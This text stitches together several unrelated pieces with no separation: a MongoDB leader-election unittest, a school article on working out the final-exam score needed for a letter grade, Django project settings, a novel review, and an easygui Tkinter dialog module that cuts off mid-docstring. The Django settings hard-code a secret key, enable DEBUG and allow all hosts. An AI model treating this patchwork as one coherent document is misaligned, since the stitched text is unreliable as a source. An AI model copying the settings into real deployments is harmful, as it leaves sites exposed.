#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
test_mongoelector
----------------------------------

Tests for `mongoelector` module.
"""

import unittest
from time import sleep
from pymongo import MongoClient
from mongoelector import MongoElector
from random import randint


class TestMongoelector(unittest.TestCase):
    """Test Mongoelector Functionality"""

    def setUp(self):
        """setup unittests"""
        db = getattr(MongoClient(), "ml_unittest")
        db.ml_unittest.electorlocks.drop()

    def tearDown(self):
        """teardown unittests"""
        db = getattr(MongoClient(), "ml_unittest")
        db.electorlocks.drop()

    def test_000_init(self):
        """Smoke test"""
        db = getattr(MongoClient(), "ml_unittest")
        MongoElector('test_001_init', db)

    def test_001_run(self):
        db = getattr(MongoClient(), "ml_unittest")
        m1 = MongoElector('test_001_run_' + str(randint(0, 10000)), db, ttl=15)
        m1.start()
        c = 0
        while c < 30 and m1.ismaster is False:
            c += 1
            sleep(1)
        self.assertTrue(m1.ismaster)
        self.assertTrue(m1.running)
        m1.poll()
        self.assertIsInstance(m1.cluster_detail, dict)
        m1.stop()
        m1.poll()
        c = 0
        while c < 30 and m1.ismaster is True:
            c += 1
            sleep(1)
        self.assertFalse(m1.ismaster)


if __name__ == '__main__':
    import sys
    sys.exit(unittest.main())
With winter break approaching quickly, students begin to anticipate all the excitement of Christmas: no homework, sleeping in till the afternoon and much more. The only downside is that the obstacle of finals pushes its way into your life and drags you down the path of stress, studying and sleeplessness. “To help me study for finals, I study for 30 minutes then take a 10 minute break and just repeat the cycle so my brain gets breaks,” senior Mandy Heutel said. Start by finding out what you need to get on the final: add together your first and second quarter grades, then multiply the total by two. Depending on what grade you want to achieve, subtract that total from 450 for an A, from 400 for a B, from 350 for a C, from 300 for a D, or from 250 for an F; the result is the score you need on the final. (This works because each quarter counts for 40 percent of the semester grade and the final counts for the remaining 20 percent.) Example: If I had an 85.09 percent for the first quarter and an 86.63 percent for the second quarter, I would add them together to get a total of 171.72, then multiply the sum by two, which would be 343.44. Let’s say I want a B; I would subtract that number from 400. I would need to get at least a 56.56 percent on my final to achieve a B in the class.
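For anyone who would rather not do the arithmetic by hand, the same calculation is easy to script. The sketch below is a minimal example assuming the 40/40/20 weighting described above; the function name and the letter-grade cutoffs (90/80/70/60/50, implied by the article's 450/400/350/300/250 figures) are illustrative, not part of the original article.

# Minimal sketch of the final-exam calculation described above.
# Assumes each quarter is worth 40% and the final 20% of the semester grade.
TARGETS = {"A": 90, "B": 80, "C": 70, "D": 60, "F": 50}

def required_final(q1, q2, letter):
    """Return the final-exam percentage needed to end the semester
    at the given letter grade, given two quarter percentages."""
    total = (q1 + q2) * 2               # "add the quarters, multiply by two"
    return TARGETS[letter] * 5 - total  # same as subtracting from 450/400/350/...

if __name__ == "__main__":
    # The article's example: 85.09 and 86.63, aiming for a B.
    print(required_final(85.09, 86.63, "B"))  # -> about 56.56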
""" Django settings for backstage project. Generated by 'django-admin startproject' using Django 1.9.1. For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os from unipath import Path # Build paths inside the project like this: os.path.join(BASE_DIR, ...) # BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) BASE_DIR = Path(__file__).ancestor(3) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '45h_l__1dn&5sr(gb)l*x9j6fw=3okecd10ilotci-95gy1m^o' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = ['*',] # Application definition INSTALLED_APPS = [ 'jet', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'django_extensions', 'adminsortable2', 'storages', 'rest_framework', 'django_assets', 'imagekit', 'solo', 'ckeditor', 'api', 'facade', 'opere', 'foti', 'scritti', 'frontend', ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] REST_FRAMEWORK = { # Use Django's standard `django.contrib.auth` permissions, # or allow read-only access for unauthenticated users. 'DEFAULT_PERMISSION_CLASSES': [ 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly' ] } ROOT_URLCONF = 'urls.base' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'backstage.wsgi.application' # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/' STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ) CKEDITOR_JQUERY_URL = '//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js' CKEDITOR_UPLOAD_PATH = "uploads/"
All his teachers are certain that Evan Galloway can be the graduate who brings glory to small, ordinary St. Sebastian's School. As for Evan, however, he can't be bothered anymore. Since the shock of his young father's suicide last spring, Evan no longer cares about the future. In fact, he believes that he spent the first fifteen years of his life living a lie. Despite his mother's encouragement and the steadfast companionship of his best friend, Alexis, Evan is mired in rage and bitterness. Good memories seem ludicrous when the present holds no hope. Then Evan's grandmother hands him the key--literally, a key--to a locked trunk that his father hid when he was the same age as Evan is now. Digging into the trunk and the small-town secrets it uncovers, Evan can begin to face who his father really was, and why even the love of his son could not save him. In a voice that resonates with the authenticity of grief, Steven Parlato tells a different kind of coming-of-age story, about a boy thrust into adulthood too soon, through the corridor of shame, disbelief, and finally...compassion. Whoa....That's how I felt after reading this book. The first couple of chapters start off slow, and you begin to question whether you want to put the book down, but you keep reading because you have to know the truth. Evan, the main character, goes through a lot in the beginning trying to wrap his head around his father's suicide. He's left with a huge hole in his heart, and you can feel the grief he is going through. It isn't until his grandmother gives him the key to a trunk holding all of his father's secrets that Evan is struck with the hard truth about his father's past--a truth kept secret for so long--and why he ended his life. The truth he finds out is shocking and chilling. I won't say what it is, because that would spoil the book for you, but it is a must read. The journey Evan goes through in uncovering the truth is very graphic and at times uncomfortable to read, but once you get through it, you see at the end that Evan is proud to be named after his father. You see that knowing the truth about his father in a way set both of them free. Disclosure: All opinions are my own. I received The Namesake at no cost for the purpose of this review. No other compensation was received.
""" .. moduleauthor:: Stephen Raymond Ferg and Robert Lugg (active) .. default-domain:: py .. highlight:: python Version |release| """ from __future__ import print_function from __future__ import unicode_literals from __future__ import division from __future__ import absolute_import from builtins import zip from builtins import dict from builtins import str from builtins import range from builtins import int from future import standard_library standard_library.install_aliases() from builtins import object import os import string from . import utils as ut from .utils import * from . import state as st # Initialize some global variables that will be reset later __choiceboxMultipleSelect = None __replyButtonText = None __choiceboxResults = None __firstWidget = None __enterboxText = None __enterboxDefaultText = "" __multenterboxText = "" choiceboxChoices = None choiceboxWidget = None entryWidget = None boxRoot = None # ------------------------------------------------------------------- # buttonbox # ------------------------------------------------------------------- def buttonbox(msg="", title=" ", choices=("Button[1]", "Button[2]", "Button[3]"), image=None, root=None, default_choice=None, cancel_choice=None): """ Display a msg, a title, an image, and a set of buttons. The buttons are defined by the members of the choices list. :param str msg: the msg to be displayed :param str title: the window title :param list choices: a list or tuple of the choices to be displayed :param str image: Filename of image to display :param str default_choice: The choice you want highlighted when the gui appears :param str cancel_choice: If the user presses the 'X' close, which button should be pressed :return: the text of the button that the user selected """ global boxRoot, __replyButtonText, buttonsFrame # If default is not specified, select the first button. This matches old # behavior. if default_choice is None: default_choice = choices[0] # Initialize __replyButtonText to the first choice. # This is what will be used if the window is closed by the close button. __replyButtonText = choices[0] if root: root.withdraw() boxRoot = Toplevel(master=root) boxRoot.withdraw() else: boxRoot = Tk() boxRoot.withdraw() boxRoot.title(title) boxRoot.iconname('Dialog') boxRoot.geometry(st.rootWindowPosition) boxRoot.minsize(400, 100) # ------------- define the messageFrame --------------------------------- messageFrame = Frame(master=boxRoot) messageFrame.pack(side=TOP, fill=BOTH) # ------------- define the imageFrame --------------------------------- if image: tk_Image = None try: tk_Image = ut.load_tk_image(image) except Exception as inst: print(inst) if tk_Image: imageFrame = Frame(master=boxRoot) imageFrame.pack(side=TOP, fill=BOTH) label = Label(imageFrame, image=tk_Image) label.image = tk_Image # keep a reference! 
label.pack(side=TOP, expand=YES, fill=X, padx='1m', pady='1m') # ------------- define the buttonsFrame --------------------------------- buttonsFrame = Frame(master=boxRoot) buttonsFrame.pack(side=TOP, fill=BOTH) # -------------------- place the widgets in the frames ------------------- messageWidget = Message(messageFrame, text=msg, width=400) messageWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE)) messageWidget.pack(side=TOP, expand=YES, fill=X, padx='3m', pady='3m') __put_buttons_in_buttonframe(choices, default_choice, cancel_choice) # -------------- the action begins ----------- boxRoot.deiconify() boxRoot.mainloop() boxRoot.destroy() if root: root.deiconify() return __replyButtonText def bindArrows(widget): widget.bind("<Down>", tabRight) widget.bind("<Up>", tabLeft) widget.bind("<Right>", tabRight) widget.bind("<Left>", tabLeft) def tabRight(event): boxRoot.event_generate("<Tab>") def tabLeft(event): boxRoot.event_generate("<Shift-Tab>") # ----------------------------------------------------------------------- # __multfillablebox # ----------------------------------------------------------------------- def __multfillablebox(msg="Fill in values for the fields.", title=" ", fields=(), values=(), mask=None): global boxRoot, __multenterboxText, __multenterboxDefaultText, cancelButton, entryWidget, okButton choices = ["OK", "Cancel"] if len(fields) == 0: return None fields = list(fields[:]) # convert possible tuples to a list values = list(values[:]) # convert possible tuples to a list # TODO RL: The following seems incorrect when values>fields. Replace # below with zip? if len(values) == len(fields): pass elif len(values) > len(fields): fields = fields[0:len(values)] else: while len(values) < len(fields): values.append("") boxRoot = Tk() boxRoot.protocol('WM_DELETE_WINDOW', __multenterboxQuit) boxRoot.title(title) boxRoot.iconname('Dialog') boxRoot.geometry(st.rootWindowPosition) boxRoot.bind("<Escape>", __multenterboxCancel) # -------------------- put subframes in the boxRoot -------------------- messageFrame = Frame(master=boxRoot) messageFrame.pack(side=TOP, fill=BOTH) # -------------------- the msg widget ---------------------------- messageWidget = Message(messageFrame, width="4.5i", text=msg) messageWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE)) messageWidget.pack(side=RIGHT, expand=1, fill=BOTH, padx='3m', pady='3m') global entryWidgets entryWidgets = list() lastWidgetIndex = len(fields) - 1 for widgetIndex in range(len(fields)): argFieldName = fields[widgetIndex] argFieldValue = values[widgetIndex] entryFrame = Frame(master=boxRoot) entryFrame.pack(side=TOP, fill=BOTH) # --------- entryWidget ---------------------------------------------- labelWidget = Label(entryFrame, text=argFieldName) labelWidget.pack(side=LEFT) entryWidget = Entry(entryFrame, width=40, highlightthickness=2) entryWidgets.append(entryWidget) entryWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.TEXT_ENTRY_FONT_SIZE)) entryWidget.pack(side=RIGHT, padx="3m") bindArrows(entryWidget) entryWidget.bind("<Return>", __multenterboxGetText) entryWidget.bind("<Escape>", __multenterboxCancel) # for the last entryWidget, if this is a multpasswordbox, # show the contents as just asterisks if widgetIndex == lastWidgetIndex: if mask: entryWidgets[widgetIndex].configure(show=mask) # put text into the entryWidget if argFieldValue is None: argFieldValue = '' entryWidgets[widgetIndex].insert(0, '{}'.format(argFieldValue)) widgetIndex += 1 # 
------------------ ok button ------------------------------- buttonsFrame = Frame(master=boxRoot) buttonsFrame.pack(side=BOTTOM, fill=BOTH) okButton = Button(buttonsFrame, takefocus=1, text="OK") bindArrows(okButton) okButton.pack( expand=1, side=LEFT, padx='3m', pady='3m', ipadx='2m', ipady='1m') # for the commandButton, bind activation events to the activation event # handler commandButton = okButton handler = __multenterboxGetText for selectionEvent in st.STANDARD_SELECTION_EVENTS: commandButton.bind("<%s>" % selectionEvent, handler) # ------------------ cancel button ------------------------------- cancelButton = Button(buttonsFrame, takefocus=1, text="Cancel") bindArrows(cancelButton) cancelButton.pack( expand=1, side=RIGHT, padx='3m', pady='3m', ipadx='2m', ipady='1m') # for the commandButton, bind activation events to the activation event # handler commandButton = cancelButton handler = __multenterboxCancel for selectionEvent in st.STANDARD_SELECTION_EVENTS: commandButton.bind("<%s>" % selectionEvent, handler) # ------------------- time for action! ----------------- entryWidgets[0].focus_force() # put the focus on the entryWidget boxRoot.mainloop() # run it! # -------- after the run has completed ---------------------------------- boxRoot.destroy() # button_click didn't destroy boxRoot, so we do it now return __multenterboxText # ----------------------------------------------------------------------- # __multenterboxGetText # ----------------------------------------------------------------------- def __multenterboxGetText(event): global __multenterboxText __multenterboxText = list() for entryWidget in entryWidgets: __multenterboxText.append(entryWidget.get()) boxRoot.quit() def __multenterboxCancel(event): global __multenterboxText __multenterboxText = None boxRoot.quit() def __multenterboxQuit(): __multenterboxCancel(None) def __fillablebox(msg, title="", default="", mask=None, image=None, root=None): """ Show a box in which a user can enter some text. You may optionally specify some default text, which will appear in the enterbox when it is displayed. Returns the text that the user entered, or None if he cancels the operation. """ global boxRoot, __enterboxText, __enterboxDefaultText global cancelButton, entryWidget, okButton if title is None: title == "" if default is None: default = "" __enterboxDefaultText = default __enterboxText = __enterboxDefaultText if root: root.withdraw() boxRoot = Toplevel(master=root) boxRoot.withdraw() else: boxRoot = Tk() boxRoot.withdraw() boxRoot.protocol('WM_DELETE_WINDOW', __enterboxQuit) boxRoot.title(title) boxRoot.iconname('Dialog') boxRoot.geometry(st.rootWindowPosition) boxRoot.bind("<Escape>", __enterboxCancel) # ------------- define the messageFrame --------------------------------- messageFrame = Frame(master=boxRoot) messageFrame.pack(side=TOP, fill=BOTH) # ------------- define the imageFrame --------------------------------- try: tk_Image = ut.load_tk_image(image) except Exception as inst: print(inst) tk_Image = None if tk_Image: imageFrame = Frame(master=boxRoot) imageFrame.pack(side=TOP, fill=BOTH) label = Label(imageFrame, image=tk_Image) label.image = tk_Image # keep a reference! 
label.pack(side=TOP, expand=YES, fill=X, padx='1m', pady='1m') # ------------- define the buttonsFrame --------------------------------- buttonsFrame = Frame(master=boxRoot) buttonsFrame.pack(side=TOP, fill=BOTH) # ------------- define the entryFrame --------------------------------- entryFrame = Frame(master=boxRoot) entryFrame.pack(side=TOP, fill=BOTH) # ------------- define the buttonsFrame --------------------------------- buttonsFrame = Frame(master=boxRoot) buttonsFrame.pack(side=TOP, fill=BOTH) # -------------------- the msg widget ---------------------------- messageWidget = Message(messageFrame, width="4.5i", text=msg) messageWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE)) messageWidget.pack(side=RIGHT, expand=1, fill=BOTH, padx='3m', pady='3m') # --------- entryWidget ---------------------------------------------- entryWidget = Entry(entryFrame, width=40) bindArrows(entryWidget) entryWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.TEXT_ENTRY_FONT_SIZE)) if mask: entryWidget.configure(show=mask) entryWidget.pack(side=LEFT, padx="3m") entryWidget.bind("<Return>", __enterboxGetText) entryWidget.bind("<Escape>", __enterboxCancel) # put text into the entryWidget entryWidget.insert(0, __enterboxDefaultText) # ------------------ ok button ------------------------------- okButton = Button(buttonsFrame, takefocus=1, text="OK") bindArrows(okButton) okButton.pack( expand=1, side=LEFT, padx='3m', pady='3m', ipadx='2m', ipady='1m') # for the commandButton, bind activation events to the activation event # handler commandButton = okButton handler = __enterboxGetText for selectionEvent in st.STANDARD_SELECTION_EVENTS: commandButton.bind("<{}>".format(selectionEvent), handler) # ------------------ cancel button ------------------------------- cancelButton = Button(buttonsFrame, takefocus=1, text="Cancel") bindArrows(cancelButton) cancelButton.pack( expand=1, side=RIGHT, padx='3m', pady='3m', ipadx='2m', ipady='1m') # for the commandButton, bind activation events to the activation event # handler commandButton = cancelButton handler = __enterboxCancel for selectionEvent in st.STANDARD_SELECTION_EVENTS: commandButton.bind("<{}>".format(selectionEvent), handler) # ------------------- time for action! ----------------- entryWidget.focus_force() # put the focus on the entryWidget boxRoot.deiconify() boxRoot.mainloop() # run it! # -------- after the run has completed ---------------------------------- if root: root.deiconify() boxRoot.destroy() # button_click didn't destroy boxRoot, so we do it now return __enterboxText def __enterboxGetText(event): global __enterboxText __enterboxText = entryWidget.get() boxRoot.quit() def __enterboxRestore(event): global entryWidget entryWidget.delete(0, len(entryWidget.get())) entryWidget.insert(0, __enterboxDefaultText) def __enterboxCancel(event): global __enterboxText __enterboxText = None boxRoot.quit() def __enterboxQuit(): return __enterboxCancel(None) # ----------------------------------------------------------------------- # __choicebox # ----------------------------------------------------------------------- def __choicebox(msg, title, choices): """ internal routine to support choicebox() and multchoicebox() """ global boxRoot, __choiceboxResults, choiceboxWidget, defaultText global choiceboxWidget, choiceboxChoices # ------------------------------------------------------------------- # If choices is a tuple, we make it a list so we can sort it. 
# If choices is already a list, we make a new list, so that when # we sort the choices, we don't affect the list object that we # were given. # ------------------------------------------------------------------- choices = list(choices[:]) if len(choices) == 0: choices = ["Program logic error - no choices were specified."] defaultButtons = ["OK", "Cancel"] choices = [str(c) for c in choices] # TODO RL: lines_to_show is set to a min and then set to 20 right after # that. Figure out why. lines_to_show = min(len(choices), 20) lines_to_show = 20 if title is None: title = "" # Initialize __choiceboxResults # This is the value that will be returned if the user clicks the close icon __choiceboxResults = None boxRoot = Tk() # RL: Removed so top-level program can be closed with an 'x' boxRoot.protocol('WM_DELETE_WINDOW', __choiceboxQuit) screen_width = boxRoot.winfo_screenwidth() screen_height = boxRoot.winfo_screenheight() root_width = int((screen_width * 0.8)) root_height = int((screen_height * 0.5)) root_xpos = int((screen_width * 0.1)) root_ypos = int((screen_height * 0.05)) boxRoot.title(title) boxRoot.iconname('Dialog') st.rootWindowPosition = "+0+0" boxRoot.geometry(st.rootWindowPosition) boxRoot.expand = NO boxRoot.minsize(root_width, root_height) st.rootWindowPosition = '+{0}+{1}'.format(root_xpos, root_ypos) boxRoot.geometry(st.rootWindowPosition) # ---------------- put the frames in the window -------------------------- message_and_buttonsFrame = Frame(master=boxRoot) message_and_buttonsFrame.pack(side=TOP, fill=X, expand=NO) messageFrame = Frame(message_and_buttonsFrame) messageFrame.pack(side=LEFT, fill=X, expand=YES) buttonsFrame = Frame(message_and_buttonsFrame) buttonsFrame.pack(side=RIGHT, expand=NO, pady=0) choiceboxFrame = Frame(master=boxRoot) choiceboxFrame.pack(side=BOTTOM, fill=BOTH, expand=YES) # -------------------------- put the widgets in the frames --------------- # ---------- put a msg widget in the msg frame------------------- messageWidget = Message( messageFrame, anchor=NW, text=msg, width=int(root_width * 0.9)) messageWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE)) messageWidget.pack(side=LEFT, expand=YES, fill=BOTH, padx='1m', pady='1m') # -------- put the choiceboxWidget in the choiceboxFrame ---------------- choiceboxWidget = Listbox(choiceboxFrame, height=lines_to_show, borderwidth="1m", relief="flat", bg="white" ) if __choiceboxMultipleSelect: choiceboxWidget.configure(selectmode=MULTIPLE) choiceboxWidget.configure( font=(st.PROPORTIONAL_FONT_FAMILY, st.PROPORTIONAL_FONT_SIZE)) # add a vertical scrollbar to the frame rightScrollbar = Scrollbar( choiceboxFrame, orient=VERTICAL, command=choiceboxWidget.yview) choiceboxWidget.configure(yscrollcommand=rightScrollbar.set) # add a horizontal scrollbar to the frame bottomScrollbar = Scrollbar( choiceboxFrame, orient=HORIZONTAL, command=choiceboxWidget.xview) choiceboxWidget.configure(xscrollcommand=bottomScrollbar.set) # pack the Listbox and the scrollbars. Note that although we must define # the textArea first, we must pack it last, so that the bottomScrollbar will # be located properly. 
bottomScrollbar.pack(side=BOTTOM, fill=X) rightScrollbar.pack(side=RIGHT, fill=Y) choiceboxWidget.pack( side=LEFT, padx="1m", pady="1m", expand=YES, fill=BOTH) # --------------------------------------------------- # sort the choices # eliminate duplicates # put the choices into the choicebox Widget # --------------------------------------------------- choices = ut.lower_case_sort(choices) lastInserted = None choiceboxChoices = list() for choice in choices: if choice == lastInserted: continue else: choiceboxWidget.insert(END, choice) choiceboxChoices.append(choice) lastInserted = choice boxRoot.bind('<Any-Key>', KeyboardListener) # put the buttons in the buttonsFrame if len(choices): okButton = Button( buttonsFrame, takefocus=YES, text="OK", height=1, width=6) bindArrows(okButton) okButton.pack( expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m") # for the commandButton, bind activation events to the activation event # handler commandButton = okButton handler = __choiceboxGetChoice for selectionEvent in st.STANDARD_SELECTION_EVENTS: commandButton.bind("<%s>" % selectionEvent, handler) # now bind the keyboard events choiceboxWidget.bind("<Return>", __choiceboxGetChoice) choiceboxWidget.bind("<Double-Button-1>", __choiceboxGetChoice) else: # now bind the keyboard events choiceboxWidget.bind("<Return>", __choiceboxCancel) choiceboxWidget.bind("<Double-Button-1>", __choiceboxCancel) cancelButton = Button( buttonsFrame, takefocus=YES, text="Cancel", height=1, width=6) bindArrows(cancelButton) cancelButton.pack( expand=NO, side=BOTTOM, padx='2m', pady='1m', ipady="1m", ipadx="2m") # for the commandButton, bind activation events to the activation event # handler commandButton = cancelButton handler = __choiceboxCancel for selectionEvent in st.STANDARD_SELECTION_EVENTS: commandButton.bind("<%s>" % selectionEvent, handler) # add special buttons for multiple select features if len(choices) and __choiceboxMultipleSelect: selectionButtonsFrame = Frame(messageFrame) selectionButtonsFrame.pack(side=RIGHT, fill=Y, expand=NO) selectAllButton = Button( selectionButtonsFrame, text="Select All", height=1, width=6) bindArrows(selectAllButton) selectAllButton.bind("<Button-1>", __choiceboxSelectAll) selectAllButton.pack( expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m") clearAllButton = Button( selectionButtonsFrame, text="Clear All", height=1, width=6) bindArrows(clearAllButton) clearAllButton.bind("<Button-1>", __choiceboxClearAll) clearAllButton.pack( expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m") # -------------------- bind some keyboard events ------------------------- boxRoot.bind("<Escape>", __choiceboxCancel) # --------------------- the action begins -------------------------------- # put the focus on the choiceboxWidget, and the select highlight on the # first item choiceboxWidget.select_set(0) choiceboxWidget.focus_force() # --- run it! 
----- boxRoot.mainloop() try: boxRoot.destroy() except: pass return __choiceboxResults def __choiceboxGetChoice(event): global boxRoot, __choiceboxResults, choiceboxWidget if __choiceboxMultipleSelect: __choiceboxResults = [ choiceboxWidget.get(index) for index in choiceboxWidget.curselection()] else: choice_index = choiceboxWidget.curselection() __choiceboxResults = choiceboxWidget.get(choice_index) boxRoot.quit() def __choiceboxSelectAll(event): global choiceboxWidget, choiceboxChoices choiceboxWidget.selection_set(0, len(choiceboxChoices) - 1) def __choiceboxClearAll(event): global choiceboxWidget, choiceboxChoices choiceboxWidget.selection_clear(0, len(choiceboxChoices) - 1) def __choiceboxCancel(event): global boxRoot, __choiceboxResults __choiceboxResults = None boxRoot.quit() def __choiceboxQuit(): __choiceboxCancel(None) def KeyboardListener(event): global choiceboxChoices, choiceboxWidget key = event.keysym if len(key) <= 1: if key in string.printable: # Find the key in the list. # before we clear the list, remember the selected member try: start_n = int(choiceboxWidget.curselection()[0]) except IndexError: start_n = -1 # clear the selection. choiceboxWidget.selection_clear(0, 'end') # start from previous selection +1 for n in range(start_n + 1, len(choiceboxChoices)): item = choiceboxChoices[n] if item[0].lower() == key.lower(): choiceboxWidget.selection_set(first=n) choiceboxWidget.see(n) return else: # has not found it so loop from top for n, item in enumerate(choiceboxChoices): if item[0].lower() == key.lower(): choiceboxWidget.selection_set(first=n) choiceboxWidget.see(n) return # nothing matched -- we'll look for the next logical choice for n, item in enumerate(choiceboxChoices): if item[0].lower() > key.lower(): if n > 0: choiceboxWidget.selection_set(first=(n - 1)) else: choiceboxWidget.selection_set(first=0) choiceboxWidget.see(n) return # still no match (nothing was greater than the key) # we set the selection to the first item in the list lastIndex = len(choiceboxChoices) - 1 choiceboxWidget.selection_set(first=lastIndex) choiceboxWidget.see(lastIndex) return # ------------------------------------------------------------------- # diropenbox # ------------------------------------------------------------------- def diropenbox(msg=None, title=None, default=None): """ A dialog to get a directory name. Note that the msg argument, if specified, is ignored. Returns the name of a directory, or None if user chose to cancel. If the "default" argument specifies a directory name, and that directory exists, then the dialog box will start with that directory. 
:param str msg: the msg to be displayed :param str title: the window title :param str default: starting directory when dialog opens :return: Normalized path selected by user """ title = getFileDialogTitle(msg, title) localRoot = Tk() localRoot.withdraw() if not default: default = None f = ut.tk_FileDialog.askdirectory( parent=localRoot, title=title, initialdir=default, initialfile=None ) localRoot.destroy() if not f: return None return os.path.normpath(f) # ------------------------------------------------------------------- # getFileDialogTitle # ------------------------------------------------------------------- def getFileDialogTitle(msg, title): """ Create nicely-formatted string based on arguments msg and title :param msg: the msg to be displayed :param title: the window title :return: None """ if msg and title: return "%s - %s" % (title, msg) if msg and not title: return str(msg) if title and not msg: return str(title) return None # no message and no title # ------------------------------------------------------------------- # class FileTypeObject for use with fileopenbox # ------------------------------------------------------------------- class FileTypeObject(object): def __init__(self, filemask): if len(filemask) == 0: raise AssertionError('Filetype argument is empty.') self.masks = list() if isinstance(filemask, ut.str): # a str or unicode self.initializeFromString(filemask) elif isinstance(filemask, list): if len(filemask) < 2: raise AssertionError('Invalid filemask.\n' + 'List contains less than 2 members: "{}"'.format(filemask)) else: self.name = filemask[-1] self.masks = list(filemask[:-1]) else: raise AssertionError('Invalid filemask: "{}"'.format(filemask)) def __eq__(self, other): if self.name == other.name: return True return False def add(self, other): for mask in other.masks: if mask in self.masks: pass else: self.masks.append(mask) def toTuple(self): return self.name, tuple(self.masks) def isAll(self): if self.name == "All files": return True return False def initializeFromString(self, filemask): # remove everything except the extension from the filemask self.ext = os.path.splitext(filemask)[1] if self.ext == "": self.ext = ".*" if self.ext == ".": self.ext = ".*" self.name = self.getName() self.masks = ["*" + self.ext] def getName(self): e = self.ext file_types = {".*": "All", ".txt": "Text", ".py": "Python", ".pyc": "Python", ".xls": "Excel"} if e in file_types: return '{} files'.format(file_types[e]) if e.startswith("."): return '{} files'.format(e[1:].upper()) return '{} files'.format(e.upper()) # ------------------------------------------------------------------- # fileopenbox # ------------------------------------------------------------------- def fileopenbox(msg=None, title=None, default='*', filetypes=None, multiple=False): """ A dialog to get a file name. **About the "default" argument** The "default" argument specifies a filepath that (normally) contains one or more wildcards. fileopenbox will display only files that match the default filepath. If omitted, defaults to "\*" (all files in the current directory). WINDOWS EXAMPLE:: ...default="c:/myjunk/*.py" will open in directory c:\\myjunk\\ and show all Python files. WINDOWS EXAMPLE:: ...default="c:/myjunk/test*.py" will open in directory c:\\myjunk\\ and show all Python files whose names begin with "test". Note that on Windows, fileopenbox automatically changes the path separator to the Windows path separator (backslash). 
**About the "filetypes" argument** If specified, it should contain a list of items, where each item is either: - a string containing a filemask # e.g. "\*.txt" - a list of strings, where all of the strings except the last one are filemasks (each beginning with "\*.", such as "\*.txt" for text files, "\*.py" for Python files, etc.). and the last string contains a filetype description EXAMPLE:: filetypes = ["*.css", ["*.htm", "*.html", "HTML files"] ] .. note:: If the filetypes list does not contain ("All files","*"), it will be added. If the filetypes list does not contain a filemask that includes the extension of the "default" argument, it will be added. For example, if default="\*abc.py" and no filetypes argument was specified, then "\*.py" will automatically be added to the filetypes argument. :param str msg: the msg to be displayed. :param str title: the window title :param str default: filepath with wildcards :param object filetypes: filemasks that a user can choose, e.g. "\*.txt" :param bool multiple: If true, more than one file can be selected :return: the name of a file, or None if user chose to cancel """ localRoot = Tk() localRoot.withdraw() initialbase, initialfile, initialdir, filetypes = fileboxSetup( default, filetypes) # ------------------------------------------------------------ # if initialfile contains no wildcards; we don't want an # initial file. It won't be used anyway. # Also: if initialbase is simply "*", we don't want an # initialfile; it is not doing any useful work. # ------------------------------------------------------------ if (initialfile.find("*") < 0) and (initialfile.find("?") < 0): initialfile = None elif initialbase == "*": initialfile = None func = ut.tk_FileDialog.askopenfilenames if multiple else ut.tk_FileDialog.askopenfilename ret_val = func(parent=localRoot, title=getFileDialogTitle(msg, title), initialdir=initialdir, initialfile=initialfile, filetypes=filetypes ) if multiple: f = [os.path.normpath(x) for x in localRoot.tk.splitlist(ret_val)] else: f = os.path.normpath(ret_val) localRoot.destroy() if not f: return None return f # ------------------------------------------------------------------- # filesavebox # ------------------------------------------------------------------- def filesavebox(msg=None, title=None, default="", filetypes=None): """ A file to get the name of a file to save. Returns the name of a file, or None if user chose to cancel. The "default" argument should contain a filename (i.e. the current name of the file to be saved). It may also be empty, or contain a filemask that includes wildcards. The "filetypes" argument works like the "filetypes" argument to fileopenbox. :param str msg: the msg to be displayed. :param str title: the window title :param str 